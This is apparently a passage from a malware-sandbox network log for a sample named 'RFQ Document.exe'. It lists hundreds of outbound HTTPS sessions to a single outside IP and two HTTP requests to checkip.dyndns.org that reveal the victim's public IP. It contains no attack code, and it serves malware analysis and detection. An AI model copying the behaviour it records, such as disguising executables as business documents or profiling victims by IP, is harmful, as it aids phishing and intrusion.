                                            280192.168.2.450117149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            281192.168.2.450118149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            282192.168.2.450119149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            283192.168.2.450120149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            284192.168.2.450121149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            285192.168.2.450122149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            286192.168.2.450123149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            287192.168.2.450124149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            288192.168.2.450125149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            289192.168.2.450126149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            29192.168.2.449803149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            290192.168.2.450127149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            291192.168.2.450128149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            292192.168.2.450129149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            293192.168.2.450130149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            294192.168.2.450131149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            295192.168.2.450132149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            296192.168.2.450133149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            297192.168.2.450134149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            298192.168.2.450135149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            299192.168.2.450136149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.449777149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            30192.168.2.449804149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            300192.168.2.450137149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            301192.168.2.450138149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            302192.168.2.450139149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            303192.168.2.450140149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            304192.168.2.450141149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            305192.168.2.450142149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            306192.168.2.450143149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            307192.168.2.450144149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            308192.168.2.450145149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            309192.168.2.450146149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            31192.168.2.449805149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            310192.168.2.450147149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            311192.168.2.450148149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            312192.168.2.450149149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            313192.168.2.450150149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            314192.168.2.450151149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            315192.168.2.450152149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            316192.168.2.450153149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            317192.168.2.450154149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            318192.168.2.450155149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            319192.168.2.450156149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            32192.168.2.449806149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            320192.168.2.450157149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            321192.168.2.450158149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            322192.168.2.450159149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            323192.168.2.450160149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            324192.168.2.450161149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            325192.168.2.450162149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            326192.168.2.450163149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            327192.168.2.450164149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            328192.168.2.450165149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            329192.168.2.450166149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            33192.168.2.449807149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            330192.168.2.450167149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            331192.168.2.450168149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            332192.168.2.450169149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            333192.168.2.450170149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            334192.168.2.450171149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            335192.168.2.450172149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            336192.168.2.450173149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            337192.168.2.450174149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            338192.168.2.450175149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            339192.168.2.450176149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            34192.168.2.449810149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            340192.168.2.450177149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            341192.168.2.450178149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            342192.168.2.450179149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            343192.168.2.450180149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            344192.168.2.450181149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            345192.168.2.450182149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            346192.168.2.450183149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            347192.168.2.450184149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            348192.168.2.450185149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            349192.168.2.450186149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            35192.168.2.449811149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            350192.168.2.450187149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            351192.168.2.450188149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            352192.168.2.450189149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            353192.168.2.449773132.226.8.16980C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 28, 2021 07:58:05.232361078 CEST1329OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Sep 28, 2021 07:58:05.499944925 CEST1329INHTTP/1.1 200 OK
                                            Date: Tue, 28 Sep 2021 05:58:05 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.39</body></html>
                                            Sep 28, 2021 07:58:05.596322060 CEST1329OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Sep 28, 2021 07:58:05.864909887 CEST1329INHTTP/1.1 200 OK
                                            Date: Tue, 28 Sep 2021 05:58:05 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.39</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            36192.168.2.449812149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            37192.168.2.449813149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            38192.168.2.449814149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            39192.168.2.449815149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.449778149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            40192.168.2.449816149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            41192.168.2.449817149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            42192.168.2.449818149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            43192.168.2.449819149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            44192.168.2.449820149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            45192.168.2.449821149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            46192.168.2.449822149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            47192.168.2.449823149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            48192.168.2.449824149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            49192.168.2.449825149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.449779149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            50192.168.2.449826149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            51192.168.2.449827149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            52192.168.2.449828149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            53192.168.2.449829149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            54192.168.2.449830149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            55192.168.2.449831149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            56192.168.2.449832149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            57192.168.2.449833149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            58192.168.2.449834149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            59192.168.2.449835149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.449780149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            60192.168.2.449836149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            61192.168.2.449837149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            62192.168.2.449838149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            63192.168.2.449839149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            64192.168.2.449840149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            65192.168.2.449841149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            66192.168.2.449842149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            67192.168.2.449843149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            68192.168.2.449844149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            69192.168.2.449845149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.449781149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            70192.168.2.449846149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            71192.168.2.449847149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            72192.168.2.449848149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            73192.168.2.449849149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            74192.168.2.449850149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            75192.168.2.449851149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            76192.168.2.449852149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            77192.168.2.449853149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            78192.168.2.449854149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            79192.168.2.449855149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.449782149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            80192.168.2.449856149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            81192.168.2.449857149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            82192.168.2.449858149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            83192.168.2.449859149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            84192.168.2.449860149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            85192.168.2.449861149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            86192.168.2.449862149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            87192.168.2.449863149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            88192.168.2.449864149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            89192.168.2.449865149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            9192.168.2.449783149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            90192.168.2.449866149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            91192.168.2.449867149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            92192.168.2.449868149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            93192.168.2.449869149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            94192.168.2.449870149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            95192.168.2.449871149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            96192.168.2.449872149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            97192.168.2.449873149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            98192.168.2.449874149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData

